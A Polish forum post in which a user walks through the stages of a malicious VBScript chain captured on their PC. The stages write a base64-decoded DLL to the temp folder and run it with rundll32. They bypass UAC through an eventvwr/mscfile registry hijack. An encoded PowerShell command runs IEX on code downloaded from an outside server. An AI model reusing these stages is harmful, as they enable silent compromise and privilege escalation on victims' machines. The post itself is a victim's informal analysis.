To cały czas działa. Nie przez przypadek jest tam rekurencja bo serwer od razu nie podaje skryptu do wykonania.
W poscie pokazuje co to cudo starało się zrobic na moim komputerze ;)
Najpierw pobiera i wykonuje to (u mnie w 16 powtórzeniu):
' This script reads base64 encoded picture from file named encoded.txt,
' converts it in to back to binary reprisentation using encoding abilities
' of MSXml2.DOMDocument object and saves data to SuperPicture.jpg file
Option Explicit
Const foForReading = 1 ' Open base 64 code file for reading
Const foAsASCII = 0 ' Open base 64 code file as ASCII file
Const adSaveCreateOverWrite = 2 ' Mode for ADODB.Stream
Const adTypeBinary = 1 ' Binary file is encoded
' Variables for temp
Dim tempfolder
Dim fso
'Dim sh
' Variables for decoding
Dim objXML
Dim objDocElem
' Variable for write binary picture
Dim objStream
' TEmp Folder
Set fso = CreateObject("Scripting.FileSystemObject")
'Set sh = CreateObject("WScript.Shell")
tempfolder = fso.GetSpecialFolder(2)
' Create XML Document object and root node
' that will contain the data
Set objXML = CreateObject("MSXml2.DOMDocument")
Set objDocElem = objXML.createElement("Base64Data")
objDocElem.DataType = "bin.base64"
' Set text value
objDocElem.text = "Dane w pastebin: https://4programmers.net/Pastebin/9080"
' Open data stream to picture file
Set objStream = CreateObject("ADODB.Stream")
objStream.Type = adTypeBinary
objStream.Open()
' Get binary value and write to file
objStream.Write objDocElem.NodeTypedValue
objStream.SaveToFile tempfolder + "\\PWbx", adSaveCreateOverWrite
' Clean all
Set tempfolder = Nothing
Set fso = Nothing
Set objXML = Nothing
Set objDocElem = Nothing
Set objStream = Nothing
Pełna wersja z danymi objDocElem.text : https://4programmers.net/Pastebin/9080
Później kopiuje zapisane dane do pliku dll (31 powtórzenie pętli):
Dim objFso
Set objFso= CreateObject("Scripting.FileSystemObject")
tempfolder = objFso.GetSpecialFolder(2)
objFso.MoveFile tempfolder + "\PWbx", tempfolder + "\PWbx.dll"
w kroku 46, uruchamia funkcje z tej dll-ki:
Dim objShell, objFso, tempfolder
Set objShell = CreateObject("Shell.Application")
Set objFso= CreateObject("Scripting.FileSystemObject")
Set tempfolder = objFso.GetSpecialFolder(2)
Set objShell = CreateObject("Shell.Application")
objShell.ShellExecute "C:\Windows\System32\rundll32.exe", tempfolder + "\PWbx.dll, #1", "", "open", 1
Set objShell = Nothing
Set objFso = Nothing
Set tempfolder = Nothing
W kolejnych krokach 61,62 tworzy/usuwa wpisy w rejestrze:
Set WSobj = CreateObject("WScript.Shell")
Set objFsos = CreateObject("Scripting.FileSystemObject")
Set tempfolder = objFsos.GetSpecialFolder(2)
WSobj.RegWrite "HKCU\Software\Classes\mscfile\shell\open\command\", ""
WSobj.RegWrite "HKCU\Software\Classes\mscfile\shell\open\command\", "C:\WINDOWS\System32\rundll32.exe " + tempfolder + "\PWbx.dll, #1", "REG_SZ"
WSobj.Run ("C:\Windows\System32\eventvwr.exe")
Set WSobj = Nothing
Set objFsos = Nothing
Set WSobj = CreateObject("WScript.Shell")
WSobj.RegDelete "HKCU\Software\Classes\mscfile\shell\open\command\"
WSobj.RegDelete "HKCU\Software\Classes\mscfile\shell\open\"
WSobj.RegDelete "HKCU\Software\Classes\mscfile\shell\"
WSobj.RegDelete "HKCU\Software\Classes\mscfile\"
Set WSobj = Nothing
Później uruchamia PS:
set Fh741816 = CreateObject("shell.application")
Fh741816.ShellExecute "C:\WINDOWS\system32\WindowsPowerShell\v1.0\powershell.exe", "-EncodedCommand " + Chr(34) + "WwBTAHkAcwB0AGUAbQAuAE4AZQB0AC4AUwBlAHIAdgBpAGMAZQBQAG8AaQBuAHQATQBhAG4AYQBnAGUAcgBdADoAOgBTAGUAcgB2AGUAcgBDAGUAcgB0AGkAZgBpAGMAYQB0AGUAVgBhAGwAaQBkAGEAdABpAG8AbgBDAGEAbABsAGIAYQBjAGsAIAA9ACAAewAkAHQAcgB1AGUAfQA7ACAASQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAcwA6AC8ALwBzAGUAcgB2AGUAcwBtAGEAaQBsAGUAcgBwAHIAbwBnAHIAZQBzAC4AcwBjAGkAZQBuAGMAZQA6ADgAMAA4ADAALwBjAGgAawBlAHMAbwBzAG8AZAAvAGQAbwB3AG4AcwAvAHEAdwBlAHIAdAAnACkAOwA=" + Chr(34) + "", "", "open", 0
set Fh741816 = nothing
Jeżeli dobrze zdekodowałem to tak wygląda komenda:
[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true}; IEX (New-Object Net.WebClient).DownloadString('https://servesmailerprogres.science:8080/chkesosod/downs/qwert');
Dalej już nie czekałem, bo przez 30 minut serwer nic nie zwrócił, a ja i tak nie mam wiedzy aby sprawdzić co to robi... Jak widzisz działa i coś tam wykonuje ;)
